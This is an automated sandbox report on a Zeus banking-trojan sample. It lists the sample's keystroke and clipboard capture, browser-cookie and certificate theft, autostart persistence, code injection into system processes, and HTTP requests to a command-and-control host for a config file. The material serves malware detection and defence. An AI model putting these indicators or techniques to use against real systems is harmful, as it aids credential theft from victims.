Analysis Report

Overview

General Information

Analysis ID:	0
Start time:	14:54:49
Start date:	05/02/2015
Overall analysis duration:	0h 4m 37s
Report type:	full
Sample file name:	Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	7
HCA enabled:	true
HCA success:	true, ratio: 100% Number of executed functions: 279 Number of non-executed functions: 1211
Warnings:	Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Report FP/FN
Threshold

Signature Overview

Protection of GUI:

Contains functionality to create a new desktop

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003CD865 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

0_2_003CD865

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read the clipboard data

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003BBECC NtCreateThread,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,#3,#19,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,

0_2_003BBECC

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003CAEFC EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_003CAEFC

Hooks clipboard functions (used to sniff clipboard data)

Show sources

Source: explorer.exe

IAT, EAT or inline hook detected: module: USER32.dll function: GetClipboardData

E-Banking Fraud:

Hooks winsocket function (used for sniffing or altering network traffic)

Show sources

Source: explorer.exe

File created: function: InternetReadFile

Networking:

Urls found in memory or binary data

Show sources

Source: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	String found in binary or memory: http://
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/cspca.crl0h
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/tspca.crl0h
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://csc3-2009-aia.verisign.com/csc3-2009.cer0
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://csc3-2009-crl.verisign.com/csc3-2009.crl0d
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://go.adobe.com/kb/ts_cpsid_83708_en-usmoreinfourl0minorupdatetargetrtmadobe
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://microsoft.com0
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://ocsp.verisign.com0;
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://support.microsoft.com/?kbid=2484033
Source: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	String found in binary or memory: http://www.google.com/webhp
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://www.microsoft.com/pki/certs/cspca.crt0
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: http://www.microsoft.com/pki/certs/tspca.crt0
Source: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	String found in binary or memory: https://
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: https://www.verisign.com/rpa
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	String found in binary or memory: https://www.verisign.com/rpa0

Contains functionality to download additional files from the internet

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

0_2_003BBECC

Downloads a pdf file with wrong header

Show sources

Source: http

Bad PDF prefix: HTTP/1.1 200 OK Content-Length: 43 Content-Type: text/html Date: Thu, 05 Feb 2015 13:54:15 GMT Data Raw: 42 75 63 6b 65 74 3d 31 31 33 38 31 35 35 32 34 34 0a 42 75 63 6b 65 74 54 61 62 6c 65 3d 35 0a 52 65 73 70 6f 6e 73 65 3d 31 0a Data Ascii: Bucket=1138155244BucketTable=5Response=1

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /StageOne/Generic/PnPRequestAdditionalSoftware/x86/USB_VID_80EE_PID_0021_REV_0100/6_1_0_0/0409/input_inf/_.htm?LCID=1033&OS=6.1.7600.2.00010100.0.0.48.16385&SM=innotek%20GmbH&SPN=VirtualBox&BV=VirtualBox&MID=4120A070-FD2D-4714-91B1-58190D826E31&Queue=1 HTTP/1.1 Connection: Keep-Alive User-Agent: MSDW Host: watson.microsoft.com
Source: global traffic	HTTP traffic detected: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1 Cache-Control: max-age = 86412 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 28 Jun 2011 16:26:26 GMT If-None-Match: "0255720b035cc1:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: www.download.windowsupdate.com
Source: global traffic	HTTP traffic detected: GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1 Connection: Keep-Alive Accept: / If-Modified-Since: Mon, 21 Mar 2011 18:10:04 GMT If-None-Match: "9f711034f3e7cb1:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.microsoft.com
Source: global traffic	HTTP traffic detected: GET /pki/crl/products/WinPCA.crl HTTP/1.1 Cache-Control: max-age = 900 Connection: Keep-Alive Accept: / If-Modified-Since: Mon, 11 Jul 2011 17:48:17 GMT If-None-Match: "529950b7f23fcc1:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.microsoft.com
Source: global traffic	HTTP traffic detected: GET /pki/crl/products/WinPCA.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: www.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fwlink/?LinkId=182227 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: WATClient Host: go.microsoft.com
Source: global traffic	HTTP traffic detected: GET /3/serverphp/cfg.bin HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Host: fiu-eu.org Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /pki/crl/products/CodeSignPCA.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.microsoft.com
Source: global traffic	HTTP traffic detected: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c%3D HTTP/1.1 Cache-Control: max-age = 478693 Connection: Keep-Alive Accept: / If-Modified-Since: Sat, 06 Aug 2011 06:28:48 GMT User-Agent: Microsoft-CryptoAPI/6.1 Host: ocsp.verisign.com
Source: global traffic	HTTP traffic detected: GET /3/serverphp/cfg.bin HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Host: fiu-eu.org Cache-Control: no-cache

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: watson.microsoft.com

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /fwlink/?LinkId=151642 HTTP/1.1 Connection: Keep-Alive Accept: text/* User-Agent: SLSSoapClient Content-Length: 0 Host: go.microsoft.com

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /3/serverphp/cfg.bin HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Host: fiu-eu.org Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3/serverphp/cfg.bin HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Host: fiu-eu.org Cache-Control: no-cache

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.2.151:50036 -> 224.0.0.252:5355

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\taskhost.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run {4444357F-85DA-FDF7-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run {4444357F-85DA-FDF7-676C-E42BACAD1769}

Monitors registry run keys for changes

Show sources

Source: C:\Windows\System32\taskhost.exe

Registry key monitored: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_003C67DB socket,bind,#3,	0_2_003C67DB
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_003C64FD socket,bind,listen,#3,	0_2_003C64FD
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_004167DB socket,bind,closesocket,	0_2_004167DB
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_004164FD socket,bind,listen,closesocket,	0_2_004164FD
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Code function: 1_2_004167DB socket,bind,closesocket,	1_2_004167DB
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Code function: 1_2_004164FD socket,bind,listen,closesocket,	1_2_004164FD
Source: C:\Windows\System32\taskhost.exe	Code function: 2_2_011A64FD socket,bind,listen,#3,	2_2_011A64FD
Source: C:\Windows\System32\taskhost.exe	Code function: 2_2_011A67DB socket,bind,#3,	2_2_011A67DB
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_006464FD socket,bind,listen,#3,	4_2_006464FD
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_006467DB socket,bind,#3,	4_2_006467DB
Source: C:\Windows\explorer.exe	Code function: 5_2_01B664FD socket,bind,listen,#3,	5_2_01B664FD
Source: C:\Windows\explorer.exe	Code function: 5_2_01B667DB socket,bind,#3,	5_2_01B667DB
Source: C:\Windows\System32\conhost.exe	Code function: 6_2_000C67DB socket,bind,#3,	6_2_000C67DB
Source: C:\Windows\System32\conhost.exe	Code function: 6_2_000C64FD socket,bind,listen,#3,	6_2_000C64FD
Source: C:\Windows\System32\taskhost.exe	Code function: 7_2_005167DB socket,bind,#3,	7_2_005167DB
Source: C:\Windows\System32\taskhost.exe	Code function: 7_2_005164FD socket,bind,listen,#3,	7_2_005164FD
Source: C:\Windows\System32\WinSAT.exe	Code function: 8_2_01D264FD socket,bind,listen,#3,	8_2_01D264FD
Source: C:\Windows\System32\WinSAT.exe	Code function: 8_2_01D267DB socket,bind,#3,	8_2_01D267DB
Source: C:\Windows\System32\conhost.exe	Code function: 9_2_001B67DB socket,bind,#3,	9_2_001B67DB
Source: C:\Windows\System32\conhost.exe	Code function: 9_2_001B64FD socket,bind,listen,#3,	9_2_001B64FD
Source: C:\Windows\System32\cmd.exe	Code function: 10_2_000467DB socket,bind,#3,	10_2_000467DB
Source: C:\Windows\System32\cmd.exe	Code function: 10_2_000464FD socket,bind,listen,#3,	10_2_000464FD

Contains VNC / remote desktop functionality (RFB version string found)

Show sources

Source: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

String found in binary or memory: RFB 003.003

Stealing of Sensitive Information:

Steals Internet Explorer cookies

Show sources

Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@promotion.adobe[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@apmebf[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@live[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@wemfbox[2].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@www.bing[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@msnportal.112.2o7[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@usa[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@scorecardresearch[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@adobe[3].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@exp.www.msn[2].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@msn[2].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@sun[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@mediaplex[2].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@adobe[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@java[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@doubleclick[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@atdmt[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bing[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@c.bing[1].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@dl.javafx[2].txt
Source: C:\Windows\System32\taskhost.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@ad.wsod[2].txt

Searches for Windows Mail specific files

Show sources

Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\taskhost.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery unknown

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

File created: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C70A1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,FreeLibrary,

0_2_003C70A1

PE file contains an invalid checksum

Show sources

Source: initial sample

Static PE information: real checksum: 0x0 should be: 0x2399b

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C8AE4 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,

0_2_003C8AE4

System Summary:

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\coretech\source\roxy_acrobat_9x\jpeg2k\public\binaries\windows\vs2005\release\dynamic\JP2KLib.pdb source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Show sources

Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr

Binary string: ! cci: !NCI: Op=BIND, Layer=NDIS, Upper=Tcpip6 Lower=\Device\{40017925-B58D-4581-8665-C6C9EDC5B7EF}, Error=00000019

Contains functionality to access the windows certificate store

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_003CD5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	0_2_003CD5FB
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_003CD486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	0_2_003CD486
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_0041D5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	0_2_0041D5FB
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Code function: 0_2_0041D486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	0_2_0041D486
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Code function: 1_2_0041D5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	1_2_0041D5FB
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Code function: 1_2_0041D486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	1_2_0041D486
Source: C:\Windows\System32\taskhost.exe	Code function: 2_2_011AD5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	2_2_011AD5FB
Source: C:\Windows\System32\taskhost.exe	Code function: 2_2_011AD486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	2_2_011AD486
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0064D486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	4_2_0064D486
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0064D5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	4_2_0064D5FB
Source: C:\Windows\explorer.exe	Code function: 5_2_01B6D5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	5_2_01B6D5FB
Source: C:\Windows\explorer.exe	Code function: 5_2_01B6D486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	5_2_01B6D486
Source: C:\Windows\System32\conhost.exe	Code function: 6_2_000CD486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	6_2_000CD486
Source: C:\Windows\System32\conhost.exe	Code function: 6_2_000CD5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	6_2_000CD5FB
Source: C:\Windows\System32\taskhost.exe	Code function: 7_2_0051D5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	7_2_0051D5FB
Source: C:\Windows\System32\taskhost.exe	Code function: 7_2_0051D486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	7_2_0051D486
Source: C:\Windows\System32\WinSAT.exe	Code function: 8_2_01D2D5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	8_2_01D2D5FB
Source: C:\Windows\System32\WinSAT.exe	Code function: 8_2_01D2D486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	8_2_01D2D486
Source: C:\Windows\System32\conhost.exe	Code function: 9_2_001BD486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	9_2_001BD486
Source: C:\Windows\System32\conhost.exe	Code function: 9_2_001BD5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	9_2_001BD5FB
Source: C:\Windows\System32\cmd.exe	Code function: 10_2_0004D5FB CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	10_2_0004D5FB
Source: C:\Windows\System32\cmd.exe	Code function: 10_2_0004D486 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	10_2_0004D486

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C4A87 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_003C4A87

Contains functionality to enum processes or threads

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C4A30 CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

0_2_003C4A30

Creates files inside the user directory

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

File created: C:\Users\admin\AppData\Roaming\Oddyn

Creates temporary files

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

File created: C:\Users\admin\AppData\Local\Temp\tmp02840f01.bat

Executes batch files

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\tmp02840f01.bat

PE file has an executable .text section and no other executable section

Show sources

Source: initial sample

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Spawns processes

Show sources

Source: unknown	Process created: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe
Source: unknown	Process created: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Process created: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe C:\Users\admin\AppData\Roaming\Oddyn\madog.exe
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\tmp02840f01.bat

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WinSAT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a07-f192-11d4-a65f-0040963251e5}\InProcServer32

Contains functionality to call native functions

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

0_2_003BBECC

Contains functionality to launch a process as a different user

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C4CDD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_003C4CDD

Contains functionality to shutdown / reboot the system

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C2D01 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

0_2_003C2D01

Creates files inside the system directory

Show sources

Source: C:\Windows\System32\WinSAT.exe

File created: C:\Windows\Performance\WinSAT\DataStore\2015-02-05 14.55.11.358 DWM.Assessment (Recent).WinSAT.xml

Creates mutexes

Show sources

Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-D8D4-65C613159684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{CF5A2877-98D2-76E9-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A2504957-F9F2-1BE3-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-B0D0-65C67B119684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-FCD7-65C637169684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-ECD9-65C627189684}
